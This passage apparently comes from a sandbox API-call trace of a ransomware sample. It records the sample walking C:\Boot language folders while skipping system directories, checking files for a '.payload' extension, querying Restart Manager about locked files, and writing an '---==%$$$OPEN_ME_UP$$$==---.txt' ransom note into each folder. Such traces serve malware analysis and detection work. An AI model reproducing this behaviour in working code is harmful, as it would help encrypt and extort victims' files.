(lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0068.576] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.576] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0068.576] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0068.576] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.577] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0068.577] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0068.577] RmStartSession () returned 0x0 [0068.581] RmRegisterResources () returned 0x0 [0068.585] RmGetList () returned 0x0 [0068.710] RmEndSession () returned 0x0 [0068.789] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0068.789] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0068.789] FindClose (in: hFindFile=0x606420 | out: hFindFile=0x606420) returned 1 [0068.789] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0068.789] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\el-gr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0068.791] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0068.792] CloseHandle (hObject=0x430) returned 1 [0068.792] GetProcessHeap () returned 0x5e0000 [0068.793] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0068.793] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-GB", cAlternateFileName="")) returned 1 [0068.793] lstrcmpiW (lpString1="en-GB", lpString2="Windows") returned -1 [0068.793] lstrcmpiW (lpString1="en-GB", lpString2="$Recycle.bin") returned 1 [0068.793] lstrcmpiW (lpString1="en-GB", lpString2="System Volume Information") returned -1 [0068.793] lstrcmpiW (lpString1="en-GB", lpString2="Program Files") returned -1 [0068.793] lstrcmpiW (lpString1="en-GB", lpString2="Program Files (x86)") returned -1 [0068.793] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB") returned 17 [0068.793] lstrcmpW (lpString1="en-GB", lpString2=".") returned 1 [0068.793] lstrcmpW (lpString1="en-GB", lpString2="..") returned 1 [0068.793] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-GB", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0068.793] GetProcessHeap () returned 0x5e0000 [0068.793] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0068.793] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\*") returned 19 [0068.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-GB\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606820 [0068.793] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0068.793] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0068.793] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0068.793] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0068.793] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0068.793] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\.") returned 19 [0068.793] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0068.793] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0068.793] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0068.793] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0068.793] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0068.793] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0068.793] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0068.794] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\..") returned 20 [0068.794] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0068.794] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0068.794] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0068.794] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0068.794] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0068.794] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0068.794] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0068.794] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0068.794] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 33 [0068.794] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0068.794] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0068.794] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0068.794] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0068.794] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.794] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0068.794] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0068.794] RmStartSession () returned 0x0 [0068.797] RmRegisterResources () returned 0x0 [0068.801] RmGetList () returned 0x0 [0068.886] RmEndSession () returned 0x0 [0069.251] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0069.251] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0069.251] FindClose (in: hFindFile=0x606820 | out: hFindFile=0x606820) returned 1 [0069.251] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-GB\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0069.251] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\en-gb\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0069.251] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0069.254] CloseHandle (hObject=0x430) returned 1 [0069.254] GetProcessHeap () returned 0x5e0000 [0069.255] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0069.255] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.255] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0069.255] lstrcmpiW (lpString1="en-US", lpString2="$Recycle.bin") returned 1 [0069.255] lstrcmpiW (lpString1="en-US", lpString2="System Volume Information") returned -1 [0069.255] lstrcmpiW (lpString1="en-US", lpString2="Program Files") returned -1 [0069.255] lstrcmpiW (lpString1="en-US", lpString2="Program Files (x86)") returned -1 [0069.255] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0069.255] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0069.255] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0069.255] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.255] GetProcessHeap () returned 0x5e0000 [0069.255] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0069.255] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0069.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606220 [0069.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.256] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.256] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.256] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.256] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.256] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0069.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.256] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.256] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.256] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.256] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.256] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.256] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0069.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.256] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef569843, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0x327294d0, ftLastWriteTime.dwHighDateTime=0x1d2a030, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0069.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0069.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0069.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0069.256] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0069.256] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0069.256] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0069.256] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.256] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0069.256] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0069.256] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.257] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0069.257] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0069.257] RmStartSession () returned 0x0 [0069.260] RmRegisterResources () returned 0x0 [0069.265] RmGetList () returned 0x0 [0069.492] RmEndSession () returned 0x0 [0069.593] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0069.593] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.593] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0069.593] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0069.593] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0069.593] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0069.594] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0069.594] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0069.594] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0069.594] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.594] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0069.594] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0069.594] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.594] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0069.594] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0069.594] RmStartSession () returned 0x0 [0069.597] RmRegisterResources () returned 0x0 [0069.601] RmGetList () returned 0x0 [0069.865] RmEndSession () returned 0x0 [0069.972] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0069.972] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0069.972] FindClose (in: hFindFile=0x606220 | out: hFindFile=0x606220) returned 1 [0069.972] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0069.972] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\en-us\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0070.020] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0070.021] CloseHandle (hObject=0x430) returned 1 [0070.021] GetProcessHeap () returned 0x5e0000 [0070.021] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0070.021] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="es-ES", cAlternateFileName="")) returned 1 [0070.021] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0070.021] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0070.021] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0070.021] lstrcmpiW (lpString1="es-ES", lpString2="Program Files") returned -1 [0070.021] lstrcmpiW (lpString1="es-ES", lpString2="Program Files (x86)") returned -1 [0070.021] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0070.021] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0070.021] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0070.021] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0070.021] GetProcessHeap () returned 0x5e0000 [0070.021] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0070.021] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0070.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6061a0 [0070.022] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0070.022] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0070.022] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0070.022] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0070.022] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0070.022] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0070.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.022] FindNextFileW (in: hFindFile=0x6061a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0070.022] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0070.022] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0070.022] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0070.022] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0070.022] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0070.022] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0070.022] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.022] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.022] FindNextFileW (in: hFindFile=0x6061a0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.022] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0070.022] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0070.022] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0070.022] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0070.022] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0070.022] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0070.022] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0070.022] lstrcmpW 